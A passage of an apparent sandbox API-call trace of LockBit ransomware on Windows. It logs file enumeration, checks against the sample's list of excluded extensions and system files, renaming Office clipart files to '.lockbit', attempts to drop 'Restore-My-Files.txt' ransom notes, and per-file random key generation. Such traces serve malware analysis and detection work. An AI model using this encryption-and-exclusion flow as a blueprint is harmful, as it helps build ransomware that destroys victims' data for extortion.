0x753f0000 [0113.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.354] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.355] malloc (_Size=0xa6) returned 0x77d7a8 [0113.355] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.356] free (_Block=0x77d7a8) [0113.356] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.356] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.356] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.356] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef951100, ftCreationTime.dwHighDateTime=0x1bd4bf0, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xef951100, ftLastWriteTime.dwHighDateTime=0x1bd4bf0, nFileSizeHigh=0x0, nFileSizeLow=0x128, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01630_.WMF", cAlternateFileName="")) returned 1 [0113.362] lstrcmpiW (lpString1=".", lpString2="DD01630_.WMF") returned -1 [0113.362] lstrcmpiW (lpString1="..", lpString2="DD01630_.WMF") returned -1 [0113.362] PathFindExtensionW (pszPath="DD01630_.WMF") returned=".WMF" [0113.362] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.362] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.363] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.363] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01630_.WMF") returned 1 [0113.364] lstrcmpiW (lpString1="ntldr", lpString2="DD01630_.WMF") returned 1 [0113.364] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01630_.WMF") returned 1 [0113.364] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01630_.WMF") returned -1 [0113.364] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01630_.WMF") returned -1 [0113.364] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01630_.WMF") returned 1 [0113.364] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01630_.WMF") returned 1 [0113.364] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.364] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned=".WMF" [0113.364] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.364] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.364] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.365] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.365] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.lockbit") returned 72 [0113.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0113.366] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.366] malloc (_Size=0x40068) returned 0x3d70450 [0113.366] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=296) returned 1 [0113.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.367] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.368] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.368] malloc (_Size=0xa6) returned 0x77d7a8 [0113.368] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.369] free (_Block=0x77d7a8) [0113.369] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.369] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.369] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8660ce00, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8660ce00, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01631_.WMF", cAlternateFileName="")) returned 1 [0113.369] lstrcmpiW (lpString1=".", lpString2="DD01631_.WMF") returned -1 [0113.369] lstrcmpiW (lpString1="..", lpString2="DD01631_.WMF") returned -1 [0113.369] PathFindExtensionW (pszPath="DD01631_.WMF") returned=".WMF" [0113.369] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.369] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.370] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.370] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01631_.WMF") returned 1 [0113.371] lstrcmpiW (lpString1="ntldr", lpString2="DD01631_.WMF") returned 1 [0113.371] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01631_.WMF") returned 1 [0113.371] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01631_.WMF") returned -1 [0113.371] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01631_.WMF") returned -1 [0113.371] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01631_.WMF") returned 1 [0113.371] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01631_.WMF") returned 1 [0113.371] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.371] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned=".WMF" [0113.371] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.371] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.372] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.372] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.372] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.lockbit") returned 72 [0113.372] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.373] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.373] malloc (_Size=0x40068) returned 0x3e70008 [0113.373] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=552) returned 1 [0113.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0113.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0113.374] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.375] malloc (_Size=0xa6) returned 0x77d7a8 [0113.375] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.376] free (_Block=0x77d7a8) [0113.376] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.376] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.376] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.376] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01761_.WMF", cAlternateFileName="")) returned 1 [0113.376] lstrcmpiW (lpString1=".", lpString2="DD01761_.WMF") returned -1 [0113.376] lstrcmpiW (lpString1="..", lpString2="DD01761_.WMF") returned -1 [0113.376] PathFindExtensionW (pszPath="DD01761_.WMF") returned=".WMF" [0113.376] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.376] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.377] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.377] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW 